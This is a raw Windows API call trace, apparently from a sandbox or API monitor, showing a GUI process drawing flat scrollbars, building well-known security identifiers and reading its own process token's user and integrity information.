[0090.718] GetSysColor (nIndex=20) returned 0xffffff
[0090.719] FlatSB_SetScrollProp (param_1=0x101e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.719] FlatSB_SetScrollInfo (param_1=0x101e6, code=0, psi=0x12efce, fRedraw=1)
[0090.719] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x46, wParam=0x0, lParam=0x12eecc) returned 0x0
[0090.719] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.719] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x47, wParam=0x0, lParam=0x12eecc) returned 0x0
[0090.719] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.719] IsIconic (hWnd=0x101e6) returned 0
[0090.719] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.720] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.720] IsIconic (hWnd=0x101e6) returned 0
[0090.720] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.720] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.720] IsIconic (hWnd=0x101e6) returned 0
[0090.720] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.720] FlatSB_SetScrollProp (param_1=0x101e6, index=0x100, newValue=0x0, param_4=0) returned 0
[0090.720] GetSysColor (nIndex=20) returned 0xffffff
[0090.720] FlatSB_SetScrollProp (param_1=0x101e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.720] FlatSB_SetScrollInfo (param_1=0x101e6, code=1, psi=0x12efce, fRedraw=1) returned 0
[0090.720] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.720] IsIconic (hWnd=0x101e6) returned 0
[0090.720] GetClientRect (in: hWnd=0x101e6, lpRect=0x12ef90 | out: lpRect=0x12ef90) returned 1
[0090.720] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.720] SendMessageA (hWnd=0x101e6, Msg=0x80, wParam=0x1, lParam=0x10027)
[0090.720] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x80, wParam=0x1, lParam=0x10027)
[0090.721] CallWindowProcA (lpPrevWndFunc=0x2957038, hWnd=0x101e6, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10227
[0090.722] GetTextExtentPoint32A (in: hdc=0x2b010799, lpString="0", c=1, psizl=0x12f094 | out: psizl=0x12f094) returned 1
[0090.722] IsIconic (hWnd=0x101e6) returned 0
[0090.722] GetClientRect (in: hWnd=0x101e6, lpRect=0x12f094 | out: lpRect=0x12f094) returned 1
[0090.722] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.722] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.722] IsIconic (hWnd=0x101e6) returned 0
[0090.722] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efdc | out: lpRect=0x12efdc) returned 1
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] IsIconic (hWnd=0x101e6) returned 0
[0090.723] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] IsIconic (hWnd=0x101e6) returned 0
[0090.723] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.723] FlatSB_SetScrollProp (param_1=0x101e6, index=0x200, newValue=0x0, param_4=0) returned 0
[0090.723] GetSysColor (nIndex=20) returned 0xffffff
[0090.723] FlatSB_SetScrollProp (param_1=0x101e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.723] FlatSB_SetScrollInfo (param_1=0x101e6, code=0, psi=0x12efea, fRedraw=1) returned 0
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] IsIconic (hWnd=0x101e6) returned 0
[0090.723] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] IsIconic (hWnd=0x101e6) returned 0
[0090.723] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.723] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.723] IsIconic (hWnd=0x101e6) returned 0
[0090.723] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.723] FlatSB_SetScrollProp (param_1=0x101e6, index=0x100, newValue=0x0, param_4=0) returned 0
[0090.723] GetSysColor (nIndex=20) returned 0xffffff
[0090.723] FlatSB_SetScrollProp (param_1=0x101e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.723] FlatSB_SetScrollInfo (param_1=0x101e6, code=1, psi=0x12efea, fRedraw=1) returned 0
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efdc | out: lpRect=0x12efdc) returned 1
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.724] FlatSB_SetScrollProp (param_1=0x101e6, index=0x200, newValue=0x0, param_4=0) returned 0
[0090.724] GetSysColor (nIndex=20) returned 0xffffff
[0090.724] FlatSB_SetScrollProp (param_1=0x101e6, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0090.724] FlatSB_SetScrollInfo (param_1=0x101e6, code=0, psi=0x12efea, fRedraw=1) returned 0
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.724] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.724] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.724] IsIconic (hWnd=0x101e6) returned 0
[0090.725] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.725] FlatSB_SetScrollProp (param_1=0x101e6, index=0x100, newValue=0x0, param_4=0) returned 0
[0090.725] GetSysColor (nIndex=20) returned 0xffffff
[0090.725] FlatSB_SetScrollProp (param_1=0x101e6, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0090.725] FlatSB_SetScrollInfo (param_1=0x101e6, code=1, psi=0x12efea, fRedraw=1) returned 0
[0090.725] GetWindowLongA (hWnd=0x101e6, nIndex=-16) returned 116326400
[0090.725] IsIconic (hWnd=0x101e6) returned 0
[0090.725] GetClientRect (in: hWnd=0x101e6, lpRect=0x12efac | out: lpRect=0x12efac) returned 1
[0090.725] GetCurrentThreadId () returned 0xf4c
[0090.726] ConvertSidToStringSidA () returned 0x1
[0090.726] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.726] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0090.726] LocalFree (hMem=0x216f40) returned 0x0
[0090.726] LocalFree (hMem=0x202f90) returned 0x0
[0090.726] ConvertStringSidToSidA () returned 0x1
[0090.726] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a72914, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] IsValidSid (pSid=0x2a72914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] ConvertSidToStringSidA () returned 0x1
[0090.726] LocalFree (hMem=0x216f40) returned 0x0
[0090.726] LocalFree (hMem=0x202f90) returned 0x0
[0090.726] ConvertStringSidToSidA () returned 0x1
[0090.726] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7702c, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] IsValidSid (pSid=0x2a7702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] ConvertSidToStringSidA () returned 0x1
[0090.726] LocalFree (hMem=0x216f40) returned 0x0
[0090.726] LocalFree (hMem=0x202f90) returned 0x0
[0090.726] ConvertStringSidToSidA () returned 0x1
[0090.726] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f5a0, pSourceSid=0x202f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] IsValidSid (pSid=0x2a7f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0090.726] ConvertSidToStringSidA () returned 0x1
[0090.726] LocalFree (hMem=0x216f40) returned 0x0
[0090.726] LocalFree (hMem=0x202f90) returned 0x0
[0090.726] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f614, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.727] LocalFree (hMem=0x216f58) returned 0x0
[0090.727] LocalFree (hMem=0x216f40) returned 0x0
[0090.727] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f688, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.727] LocalFree (hMem=0x216f58) returned 0x0
[0090.727] LocalFree (hMem=0x216f40) returned 0x0
[0090.727] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f6fc, pSourceSid=0x216f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.727] LocalFree (hMem=0x20c1c8) returned 0x0
[0090.727] LocalFree (hMem=0x216f58) returned 0x0
[0090.727] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f770, pSourceSid=0x216f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.727] LocalFree (hMem=0x20c1c8) returned 0x0
[0090.727] LocalFree (hMem=0x216f70) returned 0x0
[0090.727] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f7f8, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.727] LocalFree (hMem=0x20c1c8) returned 0x0
[0090.727] LocalFree (hMem=0x216f40) returned 0x0
[0090.727] ConvertStringSidToSidA () returned 0x1
[0090.727] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f880, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0090.727] IsValidSid (pSid=0x2a7f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0090.727] ConvertSidToStringSidA () returned 0x1
[0090.728] LocalFree (hMem=0x216f58) returned 0x0
[0090.728] LocalFree (hMem=0x216f40) returned 0x0
[0090.728] ConvertStringSidToSidA () returned 0x1
[0090.728] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f90c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0090.728] IsValidSid (pSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0090.728] ConvertSidToStringSidA () returned 0x1
[0090.728] LocalFree (hMem=0x216f58) returned 0x0
[0090.728] LocalFree (hMem=0x216f40) returned 0x0
[0090.728] ConvertStringSidToSidA () returned 0x1
[0090.728] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f998, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0090.728] IsValidSid (pSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0090.728] ConvertSidToStringSidA () returned 0x1
[0090.728] LocalFree (hMem=0x216f58) returned 0x0
[0090.728] LocalFree (hMem=0x216f40) returned 0x0
[0090.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.728] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0090.728] GetCurrentThread () returned 0xfffffffe
[0090.728] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.728] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0090.728] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x12e86c | out: TokenHandle=0x12e86c*=0x2953756) returned 0
[0090.728] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.729] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0090.729] GetCurrentProcess () returned 0xffffffff
[0090.729] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.729] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0090.729] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a7fa3c | out: TokenHandle=0x2a7fa3c*=0x1d0) returned 1
[0090.729] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.729] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0090.729] MapGenericMask (in: AccessMask=0x12e6e4, GenericMapping=0x12e6e8 | out: AccessMask=0x12e6e4)
[0090.729] MapGenericMask (in: AccessMask=0x12e818, GenericMapping=0x12e81c | out: AccessMask=0x12e818)
[0090.729] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0090.729] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0090.729] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12e82c | out: TokenInformation=0x0, ReturnLength=0x12e82c) returned 0
[0090.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.730] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0090.730] GetLastError () returned 0x7a
[0090.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.730] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0090.730] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x210780, TokenInformationLength=0x24, ReturnLength=0x12e850 | out: TokenInformation=0x210780, ReturnLength=0x12e850) returned 1
[0090.730] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fab0, pSourceSid=0x210788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.730] IsValidSid (pSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.730] ConvertSidToStringSidA () returned 0x1
[0090.730] LocalFree (hMem=0x209e80) returned 0x0
[0090.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.730] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0090.730] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fb34, pSourceSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.730] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.730] ConvertSidToStringSidA () returned 0x1
[0090.730] LocalFree (hMem=0x209e80) returned 0x0
[0090.730] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0090.731] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0090.731] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0090.731] CloseHandle (hObject=0x1d0) returned 1
[0090.731] ConvertStringSidToSidA () returned 0x1
[0090.731] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fa54, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0090.731] IsValidSid (pSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0090.731] ConvertSidToStringSidA () returned 0x1
[0090.731] LocalFree (hMem=0x216f58) returned 0x0
[0090.731] LocalFree (hMem=0x216f40) returned 0x0
[0090.731] ConvertStringSidToSidA () returned 0x1
[0090.731] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fae0, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0090.731] IsValidSid (pSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0090.731] ConvertSidToStringSidA () returned 0x1
[0090.731] LocalFree (hMem=0x216f58) returned 0x0
[0090.731] LocalFree (hMem=0x216f40) returned 0x0
[0090.731] ConvertStringSidToSidA () returned 0x1
[0090.731] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fbfc, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0090.731] IsValidSid (pSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0090.731] ConvertSidToStringSidA () returned 0x1
[0090.731] LocalFree (hMem=0x216f58) returned 0x0
[0090.731] LocalFree (hMem=0x216f40) returned 0x0
[0090.731] ConvertStringSidToSidA () returned 0x1
[0090.731] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fc8c, pSourceSid=0x216f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0090.731] IsValidSid (pSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0090.731] ConvertSidToStringSidA () returned 0x1
[0090.731] LocalFree (hMem=0x216f58) returned 0x0
